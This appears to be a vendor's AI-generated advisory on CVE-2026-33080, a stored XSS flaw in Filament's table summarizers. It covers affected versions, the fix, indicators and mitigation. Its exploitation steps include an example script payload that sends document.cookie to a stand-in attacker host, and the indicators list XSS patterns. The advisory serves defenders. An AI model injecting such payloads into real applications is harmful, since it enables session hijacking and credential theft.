CVE-2026-33080: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33080 is a stored Cross-Site Scripting (XSS) vulnerability in Filament, a collection of full-stack components for accelerated Laravel development. The flaw affects the filament/tables package in versions 4.0.0 through 4.8.4 and 5.0.0 through 5.3.4, where the Range and Values table summarizers render raw database values without HTML escaping. It was published on March 18, 2026, by maintainer danharrin and patched the same day. The GitHub Advisory Database rates this as High severity with a CVSS v3.1 score of 7.3, while the Feedly intelligence data notes a score of 5.4 (Medium) under a different scope assumption (GitHub Advisory, Filament Security Advisory).

Technical details

The root cause is improper neutralization of HTML in web page generation (CWE-79, CWE-80): the Range.php and Values.php summarizer classes in packages/tables/src/Columns/Summarizers/ output formatted state values directly into HTML templates without applying HTML entity encoding. An authenticated attacker with write access to data fields consumed by these summarizers can store malicious HTML or JavaScript payloads in the database. When any user views a Filament table that uses the Range or Values summarizer on the affected column, the stored payload executes in their browser. The fix, applied in commit efa041a, wraps the formatState() output with HTML escaping (e.g., htmlspecialchars()) in both Range.php and Values.php (GitHub Commit, Filament Security Advisory).

Impact

Successful exploitation allows an authenticated attacker to persistently inject malicious scripts that execute in the browsers of all users who view the compromised table, including administrators. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and application interface defacement. Because the payload is stored in the database, every subsequent page load of the affected table triggers the attack without further attacker interaction (GitHub Advisory, Feedly).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of this report (Feedly). The EPSS score is approximately 0.026–0.032%, placing it in a low exploitation-probability tier. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires low privileges (authenticated access to submit data) and user interaction (a victim must view the affected table), which somewhat limits the attack surface.

Exploitation steps

  1. Reconnaissance: Identify a Filament-based Laravel application running filament/tables versions 4.0.0–4.8.4 or 5.0.0–5.3.4 by inspecting Composer dependency files (composer.json, composer.lock) or HTTP response headers/footers that reveal the framework.
  2. Obtain authenticated access: Register or log in as any user with permission to create or edit records in a model whose columns are displayed using the Range or Values summarizer in a Filament table.
  3. Identify vulnerable columns: Browse the Filament admin panel to locate tables that display Range or Values summarizers (visible as aggregated min/max ranges or comma-separated value lists in table footers).
  4. Inject malicious payload: Submit a record with a field value containing a malicious HTML/JavaScript payload (e.g., <script>document.location='https://attacker.example/steal?c='+document.cookie</script>) through the Filament form or directly via the application's API/database interface.
  5. Trigger execution: Wait for a privileged user (e.g., an administrator) to navigate to the affected table view. The stored payload renders unescaped in the summarizer output and executes in the victim's browser, enabling session token theft or other malicious actions (GitHub Advisory, Filament Security Advisory).

Indicators of compromise

  • Logs: Web server or Laravel application logs showing unusual data submissions containing HTML tags (<script>, <img>, onerror=, javascript:) in fields associated with columns using Range or Values summarizers.
  • Database: Records in application tables containing raw HTML or JavaScript strings (e.g., <script>, <svg onload=, <img src=x onerror=) in columns rendered by Filament summarizers.
  • Network: Outbound HTTP requests from victim browsers to unexpected external domains shortly after viewing Filament admin table pages, potentially carrying session cookie or token data in query parameters.
  • Browser/Client: Unexpected redirects, pop-ups, or network requests originating from Filament admin panel pages when viewing tables with Range or Values summarizers.

Mitigation and workarounds

Upgrade filament/tables to version 4.8.5 (for the 4.x branch) or 5.3.5 (for the 5.x branch), which apply HTML escaping to the Range and Values summarizer output (Filament v4.8.5 Release, Filament v5.3.5 Release). As a temporary workaround prior to patching, implement strict server-side input validation and sanitization for all data fields rendered by Range or Values summarizers to reject or strip HTML/JavaScript content. Additionally, consider restricting write access to affected data fields to trusted users only until the patch is applied (GitHub Advisory).

Community reactions

The advisory was published by Filament maintainer danharrin on March 18, 2026, and patched the same day, reflecting a responsible disclosure and rapid remediation process. Community activity on the v5.3.5 release noted positive reactions (🎉 8, 🚀 4) from contributors, suggesting the release was well-received (Filament v5.3.5 Release). No significant independent researcher commentary or major media coverage has been identified beyond standard vulnerability database aggregation.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management